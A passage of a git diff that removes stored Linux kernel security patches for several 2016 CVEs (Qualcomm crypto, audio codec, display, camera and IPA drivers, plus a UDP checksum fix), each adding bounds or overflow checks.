-skb_copy_and_csum_datagram_msg(skb, sizeof(struct udphdr), msg);
-This variant is safe vs short buffers.
-
-For the time being, instead reverting Herbert Xu patch and add back
-skb->ip_summed invalid changes, simply store the result of
-udp_lib_checksum_complete() so that we avoid computing the checksum a
-second time, and avoid the problematic
-skb_copy_and_csum_datagram_iovec() call.
-
-This patch can be applied on recent kernels as it avoids a double
-checksumming, then backported to stable kernels as a bug fix.
-
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Acked-by: Herbert Xu <herbert@gondor.apana.org.au>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv4/udp.c | 6 ++++--
- net/ipv6/udp.c | 6 ++++--
- 2 files changed, 8 insertions(+), 4 deletions(-)
-
-diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
-index 8841e98..ac14ae4 100644
---- a/net/ipv4/udp.c
-+++ b/net/ipv4/udp.c
-@@ -1271,6 +1271,7 @@ int udp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len, int noblock,
- 	int peeked, off = 0;
- 	int err;
- 	int is_udplite = IS_UDPLITE(sk);
-+	bool checksum_valid = false;
- 	bool slow;
- 
- 	if (flags & MSG_ERRQUEUE)
-@@ -1296,11 +1297,12 @@ try_again:
- 	 */
- 
- 	if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) {
--		if (udp_lib_checksum_complete(skb))
-+		checksum_valid = !udp_lib_checksum_complete(skb);
-+		if (!checksum_valid)
- 			goto csum_copy_err;
- 	}
- 
--	if (skb_csum_unnecessary(skb))
-+	if (checksum_valid || skb_csum_unnecessary(skb))
- 		err = skb_copy_datagram_msg(skb, sizeof(struct udphdr),
- 					    msg, copied);
- 	else {
-diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
-index 9da3287..00775ee 100644
---- a/net/ipv6/udp.c
-+++ b/net/ipv6/udp.c
-@@ -402,6 +402,7 @@ int udpv6_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
- 	int peeked, off = 0;
- 	int err;
- 	int is_udplite = IS_UDPLITE(sk);
-+	bool checksum_valid = false;
- 	int is_udp4;
- 	bool slow;
- 
-@@ -433,11 +434,12 @@ try_again:
- 	 */
- 
- 	if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) {
--		if (udp_lib_checksum_complete(skb))
-+		checksum_valid = !udp_lib_checksum_complete(skb);
-+		if (!checksum_valid)
- 			goto csum_copy_err;
- 	}
- 
--	if (skb_csum_unnecessary(skb))
-+	if (checksum_valid || skb_csum_unnecessary(skb))
- 		err = skb_copy_datagram_msg(skb, sizeof(struct udphdr),
- 					    msg, copied);
- 	else {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10230/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10230/ANY/0001.patch
deleted file mode 100644
index 91af1025..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10230/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From bd9a8fc6d7f6bd1a0b936994630006de450df657 Mon Sep 17 00:00:00 2001
-From: Neeraj Soni <neersoni@codeaurora.org>
-Date: Mon, 28 Nov 2016 18:23:33 +0530
-Subject: qcrypto: protect potential integer overflow.
-
-Adding user passed parameters without check might
-lead to Integer overflow and unpredictable system
-behaviour.
-
-Change-Id: Iaf8259e3c4a157e1790f1447b1b62a646988b7c4
-Signed-off-by: Neeraj Soni <neersoni@codeaurora.org>
----
- drivers/crypto/msm/qce50.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/crypto/msm/qce50.c b/drivers/crypto/msm/qce50.c
-index b33d879..9788e0e 100644
---- a/drivers/crypto/msm/qce50.c
-+++ b/drivers/crypto/msm/qce50.c
-@@ -4913,6 +4913,12 @@ int qce_aead_req(void *handle, struct qce_req *q_req)
- 	else
- 		q_req->cryptlen = areq->cryptlen - authsize;
- 
-+	if ((q_req->cryptlen > UINT_MAX - areq->assoclen) ||
-+		(q_req->cryptlen + areq->assoclen > UINT_MAX - ivsize)) {
-+			pr_err("Integer overflow on total aead req length.\n");
-+			return -EINVAL;
-+	}
-+
- 	totallen = q_req->cryptlen + areq->assoclen + ivsize;
- 
- 	if (pce_dev->support_cmd_dscr) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10231/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10231/ANY/0001.patch
deleted file mode 100644
index bd6cb256..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10231/ANY/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From 3bfe5a89916f7d29492e9f6d941d108b688cb804 Mon Sep 17 00:00:00 2001
-From: Karthikeyan Mani <kmani@codeaurora.org>
-Date: Wed, 14 Dec 2016 11:46:35 -0800
-Subject: ASoC: wcd9335: Fix out of bounds for mad input value
-
-Add check in tasha_mad_input_put function to
-return error on out of bounds access using
-mad input value.
-
-CRs-fixed: 1096799
-Change-Id: Iddaa3fef362f7cb1919aa3bd8dd4b83133fe7c97
-Signed-off-by: Karthikeyan Mani <kmani@codeaurora.org>
----
- sound/soc/codecs/wcd9335.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/sound/soc/codecs/wcd9335.c b/sound/soc/codecs/wcd9335.c
-index c94623c..1f97326 100644
---- a/sound/soc/codecs/wcd9335.c
-+++ b/sound/soc/codecs/wcd9335.c
-@@ -7575,6 +7575,13 @@ static int tasha_mad_input_put(struct snd_kcontrol *kcontrol,
- 
- 	tasha_mad_input = ucontrol->value.integer.value[0];
- 
-+	if (tasha_mad_input >= ARRAY_SIZE(tasha_conn_mad_text)) {
-+		dev_err(codec->dev,
-+			"%s: tasha_mad_input = %d out of bounds\n",
-+			__func__, tasha_mad_input);
-+		return -EINVAL;
-+	}
-+
- 	if (!strcmp(tasha_conn_mad_text[tasha_mad_input], "NOTUSED1") ||
- 	    !strcmp(tasha_conn_mad_text[tasha_mad_input], "NOTUSED2") ||
- 	    !strcmp(tasha_conn_mad_text[tasha_mad_input], "NOTUSED3") ||
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10232/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-10232/3.10/0001.patch
deleted file mode 100644
index f01b45cf..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10232/3.10/0001.patch
+++ /dev/null
@@ -1,83 +0,0 @@
-From 21e0ead58e47798567d846b84f16f89cf69a57ae Mon Sep 17 00:00:00 2001
-From: Shalini Krishnamoorthi <shakri@codeaurora.org>
-Date: Thu, 30 Jun 2016 14:00:04 -0700
-Subject: msm: mdss: Correct the format specifiers in sscanf function
-
-In many parts of the code the sscanf function was getting
-an unsigned integer with a wrong format specifier. Changed
-the format specifiers appropriately. Single variable sscanf
-were replaced by kstrtouint at reported places.
-
-CRs-Fixed: 1024872
-Change-Id: I03ce718b0456d437d31d701586965d0aa7443b51
-Signed-off-by: Shalini Krishnamoorthi <shakri@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_debug.c |  6 +++---
- drivers/video/msm/mdss/mdss_fb.c    | 10 +++++-----
- 2 files changed, 8 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c
-index 1d214ca..525cdbd 100644
---- a/drivers/video/msm/mdss/mdss_debug.c
-+++ b/drivers/video/msm/mdss/mdss_debug.c
-@@ -78,7 +78,7 @@ static ssize_t panel_debug_base_offset_write(struct file *file,
- 
- 	buf[count] = 0;	/* end of string */
- 
--	if (sscanf(buf, "%x %x", &off, &cnt) != 2)
-+	if (sscanf(buf, "%x %u", &off, &cnt) != 2)
- 		return -EFAULT;
- 
- 	if (off > dbg->max_offset)
-@@ -679,11 +679,11 @@ static ssize_t mdss_debug_factor_write(struct file *file,
- 
- 	if (strnchr(buf, count, '/')) {
- 		/* Parsing buf as fraction */
--		if (sscanf(buf, "%d/%d", &numer, &denom) != 2)
-+		if (sscanf(buf, "%u/%u", &numer, &denom) != 2)
- 			return -EFAULT;
- 	} else {
- 		/* Parsing buf as percentage */
--		if (sscanf(buf, "%d", &numer) != 1)
-+		if (kstrtouint(buf, 0, &numer))
- 			return -EFAULT;
- 		denom = 100;
- 	}
-diff --git a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c
-index 971fde4..ecc35c9 100644
---- a/drivers/video/msm/mdss/mdss_fb.c
-+++ b/drivers/video/msm/mdss/mdss_fb.c
-@@ -2,7 +2,7 @@
-  * Core MDSS framebuffer driver.
-  *
-  * Copyright (C) 2007 Google Incorporated
-- * Copyright (c) 2008-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -593,8 +593,8 @@ static ssize_t mdss_fb_force_panel_dead(struct device *dev,
- 		return len;
- 	}
- 
--	if (sscanf(buf, "%d", &pdata->panel_info.panel_force_dead) != 1)
--		pr_err("sccanf buf error!\n");
-+	if (kstrtouint(buf, 0, &pdata->panel_info.panel_force_dead))
-+		pr_err("kstrtouint buf error\n");
- 
- 	return len;
- }
-@@ -707,8 +707,8 @@ static ssize_t mdss_fb_change_dfps_mode(struct device *dev,
- 	}
- 	pinfo = &pdata->panel_info;
- 
--	if (sscanf(buf, "%d", &dfps_mode) != 1) {
--		pr_err("sccanf buf error!\n");
-+	if (kstrtouint(buf, 0, &dfps_mode)) {
-+		pr_err("kstrtouint buf error\n");
- 		return len;
- 	}
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10232/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-10232/3.18/0002.patch
deleted file mode 100644
index 6f3a9bf1..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10232/3.18/0002.patch
+++ /dev/null
@@ -1,111 +0,0 @@
-From 27f7b3b3059f6181e2786f886f4cd92f413bc30c Mon Sep 17 00:00:00 2001
-From: Shalini Krishnamoorthi <shakri@codeaurora.org>
-Date: Thu, 30 Jun 2016 14:00:04 -0700
-Subject: msm: mdss: Correct the format specifiers in sscanf function
-
-In many parts of the code the sscanf function was getting
-an unsigned integer with a wrong format specifier. Changed
-the format specifiers appropriately. Single variable sscanf
-were replaced by kstrtouint at reported places.
-
-CRs-Fixed: 1024872
-Change-Id: I03ce718b0456d437d31d701586965d0aa7443b51
-Signed-off-by: Shalini Krishnamoorthi <shakri@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_debug.c       | 8 ++++----
- drivers/video/msm/mdss/mdss_fb.c          | 8 ++++----
- drivers/video/msm/mdss/mdss_mdp.c         | 2 +-
- drivers/video/msm/mdss/mdss_mdp_overlay.c | 2 +-
- 4 files changed, 10 insertions(+), 10 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c
-index 21c2394..861d70f 100644
---- a/drivers/video/msm/mdss/mdss_debug.c
-+++ b/drivers/video/msm/mdss/mdss_debug.c
-@@ -81,7 +81,7 @@ static ssize_t panel_debug_base_offset_write(struct file *file,
- 
- 	buf[count] = 0;	/* end of string */
- 
--	if (sscanf(buf, "%x %d", &off, &cnt) != 2)
-+	if (sscanf(buf, "%x %u", &off, &cnt) != 2)
- 		return -EFAULT;
- 
- 	if (off > dbg->max_offset)
-@@ -735,11 +735,11 @@ static ssize_t mdss_debug_factor_write(struct file *file,
- 
- 	if (strnchr(buf, count, '/')) {
- 		/* Parsing buf as fraction */
--		if (sscanf(buf, "%d/%d", &numer, &denom) != 2)
-+		if (sscanf(buf, "%u/%u", &numer, &denom) != 2)
- 			return -EFAULT;
- 	} else {
- 		/* Parsing buf as percentage */
--		if (sscanf(buf, "%d", &numer) != 1)
-+		if (kstrtouint(buf, 0, &numer))
- 			return -EFAULT;
- 		denom = 100;
- 	}
-@@ -1047,7 +1047,7 @@ static ssize_t mdss_debug_perf_bw_limit_write(struct file *file,
- 
- 	if (strnchr(buf, count, ' ')) {
- 		/* Parsing buf */
--		if (sscanf(buf, "%d %d", &mode, &val) != 2)
-+		if (sscanf(buf, "%u %u", &mode, &val) != 2)
- 			return -EFAULT;
- 	}
- 
-diff --git a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c
-index dc2e318..624b344 100644
---- a/drivers/video/msm/mdss/mdss_fb.c
-+++ b/drivers/video/msm/mdss/mdss_fb.c
-@@ -600,8 +600,8 @@ static ssize_t mdss_fb_force_panel_dead(struct device *dev,
- 		return len;
- 	}
- 
--	if (sscanf(buf, "%d", &pdata->panel_info.panel_force_dead) != 1)
--		pr_err("sccanf buf error!\n");
-+	if (kstrtouint(buf, 0, &pdata->panel_info.panel_force_dead))
-+		pr_err("kstrtouint buf error!\n");
- 
- 	return len;
- }
-@@ -714,8 +714,8 @@ static ssize_t mdss_fb_change_dfps_mode(struct device *dev,
- 	}
- 	pinfo = &pdata->panel_info;
- 
--	if (sscanf(buf, "%d", &dfps_mode) != 1) {
--		pr_err("sccanf buf error!\n");
-+	if (kstrtouint(buf, 0, &dfps_mode)) {
-+		pr_err("kstrtouint buf error!\n");
- 		return len;
- 	}
- 
-diff --git a/drivers/video/msm/mdss/mdss_mdp.c b/drivers/video/msm/mdss/mdss_mdp.c
-index e2697ca..7bfbdda 100644
---- a/drivers/video/msm/mdss/mdss_mdp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp.c
-@@ -2448,7 +2448,7 @@ static ssize_t mdss_mdp_store_max_limit_bw(struct device *dev,
- 	struct mdss_data_type *mdata = dev_get_drvdata(dev);
- 	u32 data = 0;
- 
--	if (1 != sscanf(buf, "%d", &data)) {
-+	if (kstrtouint(buf, 0, &data)) {
- 		pr_info("Not able scan to bw_mode_bitmap\n");
- 	} else {
- 		mdata->bw_mode_bitmap = data;
-diff --git a/drivers/video/msm/mdss/mdss_mdp_overlay.c b/drivers/video/msm/mdss/mdss_mdp_overlay.c
-index 7e2325f..74cb38e 100644
---- a/drivers/video/msm/mdss/mdss_mdp_overlay.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_overlay.c
-@@ -2973,7 +2973,7 @@ static ssize_t dynamic_fps_sysfs_wta_dfps(struct device *dev,
- 
- 	if (pdata->panel_info.dfps_update ==
- 		DFPS_IMMEDIATE_MULTI_UPDATE_MODE_CLK_HFP) {
--		if (sscanf(buf, "%d %d %d %d %d",
-+		if (sscanf(buf, "%u %u %u %u %u",
- 		    &data.hfp, &data.hbp, &data.hpw,
- 		    &data.clk_rate, &data.fps) != 5) {
- 			pr_err("could not read input\n");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10233/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10233/ANY/0001.patch
deleted file mode 100644
index 1e482a70..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10233/ANY/0001.patch
+++ /dev/null
@@ -1,102 +0,0 @@
-From d793c6d91ecba2a1fd206ad47a4fd408d290addf Mon Sep 17 00:00:00 2001
-From: Trilokesh Rangam <tranga@codeaurora.org>
-Date: Wed, 23 Nov 2016 09:41:36 +0530
-Subject: msm-camera: Addressing possible overflow conditions
-
-Changes to address possible integer overflow and incorrect
-array indexing conditions.
-
-Change-Id: Ib134320cd6f7b34d7a10572ec347ec12127049a9
-Signed-off-by: Trilokesh Rangam <tranga@codeaurora.org>
----
- drivers/media/video/msm/io/msm_camera_io_util.c |  6 +++++
- drivers/media/video/msm/msm_mctl_pp.c           | 36 ++++++++++++++++++++++---
- 2 files changed, 38 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/media/video/msm/io/msm_camera_io_util.c b/drivers/media/video/msm/io/msm_camera_io_util.c
-index cede05d..1d2a70c 100644
---- a/drivers/media/video/msm/io/msm_camera_io_util.c
-+++ b/drivers/media/video/msm/io/msm_camera_io_util.c
-@@ -181,6 +181,12 @@ int msm_camera_config_vreg(struct device *dev, struct camera_vreg_t *cam_vreg,
- 		pr_err("%s:%d vreg sequence invalid\n", __func__, __LINE__);
- 		return -EINVAL;
- 	}
-+
-+	if (cam_vreg == NULL) {
-+		pr_err("%s:%d cam_vreg sequence invalid\n", __func__, __LINE__);
-+		return -EINVAL;
-+	}
-+
- 	if (!num_vreg_seq)
- 		num_vreg_seq = num_vreg;
- 
-diff --git a/drivers/media/video/msm/msm_mctl_pp.c b/drivers/media/video/msm/msm_mctl_pp.c
-index 8f4f004..61321bf 100644
---- a/drivers/media/video/msm/msm_mctl_pp.c
-+++ b/drivers/media/video/msm/msm_mctl_pp.c
-@@ -36,6 +36,8 @@
- #define D(fmt, args...) do {} while (0)
- #endif
- 
-+#define UINT32_MAX       (4294967295U)
-+
- static int msm_mctl_pp_buf_divert(
- 			struct msm_cam_media_controller *pmctl,
- 			struct msm_cam_v4l2_dev_inst *pcam_inst,
-@@ -668,11 +670,24 @@ int msm_mctl_pp_done(
- 			dirty = 1;
- 		}
- 	} else {
--		if (frame.num_planes > 1)
-+		if (frame.num_planes > 1) {
-+			if (frame.mp[0].phy_addr >
-+					(UINT32_MAX - frame.mp[0].data_offset)) {
-+				pr_err("%s:%d Invalid data offset\n", __func__, __LINE__);
-+				return -EINVAL;
-+
-+			}
- 			buf.ch_paddr[0] = frame.mp[0].phy_addr +
- 						frame.mp[0].data_offset;
--		else
-+		} else {
-+				if (frame.sp.phy_addr >
-+					(UINT32_MAX - frame.sp.y_off)) {
-+					pr_err("%s:%d Invalid Y offset\n", __func__, __LINE__);
-+					return -EINVAL;
-+
-+				}
- 			buf.ch_paddr[0] = frame.sp.phy_addr + frame.sp.y_off;
-+		}
- 	}
- 	spin_unlock_irqrestore(&p_mctl->pp_info.lock, flags);
- 
-@@ -713,11 +728,24 @@ int msm_mctl_pp_divert_done(
- 		buf_handle.image_mode = frame.image_type;
- 	}
- 
--	if (frame.num_planes > 1)
-+	if (frame.num_planes > 1) {
-+			if (frame.mp[0].phy_addr >
-+					(UINT32_MAX - frame.mp[0].data_offset)) {
-+				pr_err("%s:%d Invalid data offset\n", __func__, __LINE__);
-+				return -EINVAL;
-+
-+			}
- 		buf.ch_paddr[0] = frame.mp[0].phy_addr +
- 					frame.mp[0].data_offset;
--	else
-+	} else {
-+			if (frame.sp.phy_addr >
-+				(UINT32_MAX - frame.sp.y_off)) {
-+				pr_err("%s:%d Invalid Y offset\n", __func__, __LINE__);
-+				return -EINVAL;
-+
-+			}
- 		buf.ch_paddr[0] = frame.sp.phy_addr + frame.sp.y_off;
-+	}
- 
- 	spin_unlock_irqrestore(&p_mctl->pp_info.lock, flags);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10234/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-10234/3.10/0001.patch
deleted file mode 100644
index 9b73a723..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10234/3.10/0001.patch
+++ /dev/null
@@ -1,287 +0,0 @@
-From c7d7492c1e329fdeb28a7901c4cd634d41a996b1 Mon Sep 17 00:00:00 2001
-From: Skylar Chang <chiaweic@codeaurora.org>
-Date: Mon, 31 Oct 2016 17:18:15 -0700
-Subject: msm: ipa: fix ioctl input param validation
-
-Fix input parameter validation in order to avoid
-device crash because of incorrect parameter in IPA driver.
-
-Change-Id: Icbdb05aeb9211665420a872d3453dbbd24fd347b
-CRs-Fixed: 1069060
-Acked-by: Ady Abraham <adya@qti.qualcomm.com>
-Signed-off-by: Skylar Chang <chiaweic@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa_flt.c | 36 +++++++++++++++---
- drivers/platform/msm/ipa/ipa_i.h   |  2 +-
- drivers/platform/msm/ipa/ipa_nat.c | 77 +++++++++++++++++++++++++++++++++++++-
- drivers/platform/msm/ipa/ipa_rt.c  | 26 +++++++++++--
- 4 files changed, 129 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_flt.c b/drivers/platform/msm/ipa/ipa_flt.c
-index f6ebd022..72342c2 100644
---- a/drivers/platform/msm/ipa/ipa_flt.c
-+++ b/drivers/platform/msm/ipa/ipa_flt.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -235,7 +235,7 @@ static int ipa_generate_flt_hw_rule(enum ipa_ip_type ip,
-  * @ip: the ip address family type
-  * @hdr_sz: header size
-  *
-- * Returns:	0 on success, negative on failure
-+ * Returns:	size on success, negative on failure
-  *
-  * caller needs to hold any needed locks to ensure integrity
-  *
-@@ -373,7 +373,12 @@ static int ipa_generate_flt_hw_tbl_common(enum ipa_ip_type ip, u8 *base,
- 					((long)body &
- 					IPA_FLT_ENTRY_MEMORY_ALLIGNMENT));
- 		} else {
--			WARN_ON(tbl->sz == 0);
-+			if (tbl->sz == 0) {
-+				IPAERR("tbl size is 0\n");
-+				WARN_ON(1);
-+				goto proc_err;
-+			}
-+
- 			/* allocate memory for the flt tbl */
- 			flt_tbl_mem.size = tbl->sz;
- 			flt_tbl_mem.base =
-@@ -460,7 +465,12 @@ static int ipa_generate_flt_hw_tbl_common(enum ipa_ip_type ip, u8 *base,
- 						((long)body &
- 					IPA_FLT_ENTRY_MEMORY_ALLIGNMENT));
- 			} else {
--				WARN_ON(tbl->sz == 0);
-+				if (tbl->sz == 0) {
-+					IPAERR("tbl size is 0\n");
-+					WARN_ON(1);
-+					goto proc_err;
-+				}
-+
- 				/* allocate memory for the flt tbl */
- 				flt_tbl_mem.size = tbl->sz;
- 				flt_tbl_mem.base =
-@@ -534,8 +544,15 @@ static int ipa_generate_flt_hw_tbl_v1_1(enum ipa_ip_type ip,
- 	u8 *hdr;
- 	u8 *body;
- 	u8 *base;
-+	int res;
-+
-+	res = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+	if (res < 0) {
-+		IPAERR("ipa_get_flt_hw_tbl_size failed %d\n", res);
-+		return res;
-+	}
- 
--	mem->size = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+	mem->size = res;
- 	mem->size = IPA_HW_TABLE_ALIGNMENT(mem->size);
- 
- 	if (mem->size == 0) {
-@@ -720,6 +737,7 @@ static int ipa_generate_flt_hw_tbl_v2(enum ipa_ip_type ip,
- 	u32 *entr;
- 	u32 body_start_offset;
- 	u32 hdr_top;
-+	int res;
- 
- 	if (ip == IPA_IP_v4)
- 		body_start_offset = IPA_MEM_PART(apps_v4_flt_ofst) -
-@@ -756,7 +774,13 @@ static int ipa_generate_flt_hw_tbl_v2(enum ipa_ip_type ip,
- 		entr++;
- 	}
- 
--	mem->size = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+	res = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+	if (res < 0) {
-+		IPAERR("ipa_get_flt_hw_tbl_size failed %d\n", res);
-+		goto body_err;
-+	}
-+
-+	mem->size = res;
- 	mem->size -= hdr_sz;
- 	mem->size = IPA_HW_TABLE_ALIGNMENT(mem->size);
- 
-diff --git a/drivers/platform/msm/ipa/ipa_i.h b/drivers/platform/msm/ipa/ipa_i.h
-index f5bc437..adf6c0e 100644
---- a/drivers/platform/msm/ipa/ipa_i.h
-+++ b/drivers/platform/msm/ipa/ipa_i.h
-@@ -129,7 +129,7 @@
- 
- #define IPA_HW_TABLE_ALIGNMENT(start_ofst) \
- 	(((start_ofst) + 127) & ~127)
--#define IPA_RT_FLT_HW_RULE_BUF_SIZE	(128)
-+#define IPA_RT_FLT_HW_RULE_BUF_SIZE	(256)
- 
- #define IPA_HDR_PROC_CTX_TABLE_ALIGNMENT_BYTE 8
- #define IPA_HDR_PROC_CTX_TABLE_ALIGNMENT(start_ofst) \
-diff --git a/drivers/platform/msm/ipa/ipa_nat.c b/drivers/platform/msm/ipa/ipa_nat.c
-index 299e5d1..b44de4f 100644
---- a/drivers/platform/msm/ipa/ipa_nat.c
-+++ b/drivers/platform/msm/ipa/ipa_nat.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -25,6 +25,16 @@
- #define IPA_NAT_SHARED_MEMORY  1
- #define IPA_NAT_TEMP_MEM_SIZE 128
- 
-+enum nat_table_type {
-+	IPA_NAT_BASE_TBL = 0,
-+	IPA_NAT_EXPN_TBL = 1,
-+	IPA_NAT_INDX_TBL = 2,
-+	IPA_NAT_INDEX_EXPN_TBL = 3,
-+};
-+
-+#define NAT_TABLE_ENTRY_SIZE_BYTE 32
-+#define NAT_INTEX_TABLE_ENTRY_SIZE_BYTE 4
-+
- static int ipa_nat_vma_fault_remap(
- 	 struct vm_area_struct *vma, struct vm_fault *vmf)
- {
-@@ -561,6 +571,71 @@ int ipa_nat_dma_cmd(struct ipa_ioc_nat_dma_cmd *dma)
- 		ret = -EPERM;
- 		goto bail;
- 	}
-+
-+	for (cnt = 0; cnt < dma->entries; cnt++) {
-+		if (dma->dma[cnt].table_index >= 1) {
-+			IPAERR("Invalid table index %d\n",
-+				dma->dma[cnt].table_index);
-+			ret = -EPERM;
-+			goto bail;
-+		}
-+
-+		switch (dma->dma[cnt].base_addr) {
-+		case IPA_NAT_BASE_TBL:
-+			if (dma->dma[cnt].offset >=
-+				(ipa_ctx->nat_mem.size_base_tables + 1) *
-+				NAT_TABLE_ENTRY_SIZE_BYTE) {
-+				IPAERR("Invalid offset %d\n",
-+					dma->dma[cnt].offset);
-+				ret = -EPERM;
-+				goto bail;
-+			}
-+
-+			break;
-+
-+		case IPA_NAT_EXPN_TBL:
-+			if (dma->dma[cnt].offset >=
-+				ipa_ctx->nat_mem.size_expansion_tables *
-+				NAT_TABLE_ENTRY_SIZE_BYTE) {
-+				IPAERR("Invalid offset %d\n",
-+					dma->dma[cnt].offset);
-+				ret = -EPERM;
-+				goto bail;
-+			}
-+
-+			break;
-+
-+		case IPA_NAT_INDX_TBL:
-+			if (dma->dma[cnt].offset >=
-+				(ipa_ctx->nat_mem.size_base_tables + 1) *
-+				NAT_INTEX_TABLE_ENTRY_SIZE_BYTE) {
-+				IPAERR("Invalid offset %d\n",
-+					dma->dma[cnt].offset);
-+				ret = -EPERM;
-+				goto bail;
-+			}
-+
-+			break;
-+
-+		case IPA_NAT_INDEX_EXPN_TBL:
-+			if (dma->dma[cnt].offset >=
-+				ipa_ctx->nat_mem.size_expansion_tables *
-+				NAT_INTEX_TABLE_ENTRY_SIZE_BYTE) {
-+				IPAERR("Invalid offset %d\n",
-+					dma->dma[cnt].offset);
-+				ret = -EPERM;
-+				goto bail;
-+			}
-+
-+			break;
-+
-+		default:
-+			IPAERR("Invalid base_addr %d\n",
-+				dma->dma[cnt].base_addr);
-+			ret = -EPERM;
-+			goto bail;
-+		}
-+	}
- 	size = sizeof(struct ipa_desc) * dma->entries;
- 	desc = kzalloc(size, GFP_KERNEL);
- 	if (desc == NULL) {
-diff --git a/drivers/platform/msm/ipa/ipa_rt.c b/drivers/platform/msm/ipa/ipa_rt.c
-index 6e1e44f..47767cd 100644
---- a/drivers/platform/msm/ipa/ipa_rt.c
-+++ b/drivers/platform/msm/ipa/ipa_rt.c
-@@ -189,7 +189,7 @@ int __ipa_generate_rt_hw_rule_v2_5(enum ipa_ip_type ip,
-  * @hdr_sz: header size
-  * @max_rt_idx: maximal index
-  *
-- * Returns:	0 on success, negative on failure
-+ * Returns:	size on success, negative on failure
-  *
-  * caller needs to hold any needed locks to ensure integrity
-  *
-@@ -318,7 +318,11 @@ static int ipa_generate_rt_hw_tbl_common(enum ipa_ip_type ip, u8 *base, u8 *hdr,
- 					      ((long)body &
- 					      IPA_RT_ENTRY_MEMORY_ALLIGNMENT));
- 		} else {
--			WARN_ON(tbl->sz == 0);
-+			if (tbl->sz == 0) {
-+				IPAERR("cannot generate 0 size table\n");
-+				goto proc_err;
-+			}
-+
- 			/* allocate memory for the RT tbl */
- 			rt_tbl_mem.size = tbl->sz;
- 			rt_tbl_mem.base =
-@@ -391,8 +395,15 @@ static int ipa_generate_rt_hw_tbl_v1_1(enum ipa_ip_type ip,
- 	u8 *base;
- 	int max_rt_idx;
- 	int i;
-+	int res;
- 
--	mem->size = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+	res = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+	if (res < 0) {
-+		IPAERR("ipa_get_rt_hw_tbl_size failed %d\n", res);
-+		goto error;
-+	}
-+
-+	mem->size = res;
- 	mem->size = (mem->size + IPA_RT_TABLE_MEMORY_ALLIGNMENT) &
- 				~IPA_RT_TABLE_MEMORY_ALLIGNMENT;
- 
-@@ -565,6 +576,7 @@ static int ipa_generate_rt_hw_tbl_v2(enum ipa_ip_type ip,
- 	int num_index;
- 	u32 body_start_offset;
- 	u32 apps_start_idx;
-+	int res;
- 
- 	if (ip == IPA_IP_v4) {
- 		num_index = IPA_MEM_PART(v4_apps_rt_index_hi) -
-@@ -594,7 +606,13 @@ static int ipa_generate_rt_hw_tbl_v2(enum ipa_ip_type ip,
- 		entr++;
- 	}
- 
--	mem->size = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+	res = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+	if (res < 0) {
-+		IPAERR("ipa_get_rt_hw_tbl_size failed %d\n", res);
-+		goto base_err;
-+	}
-+
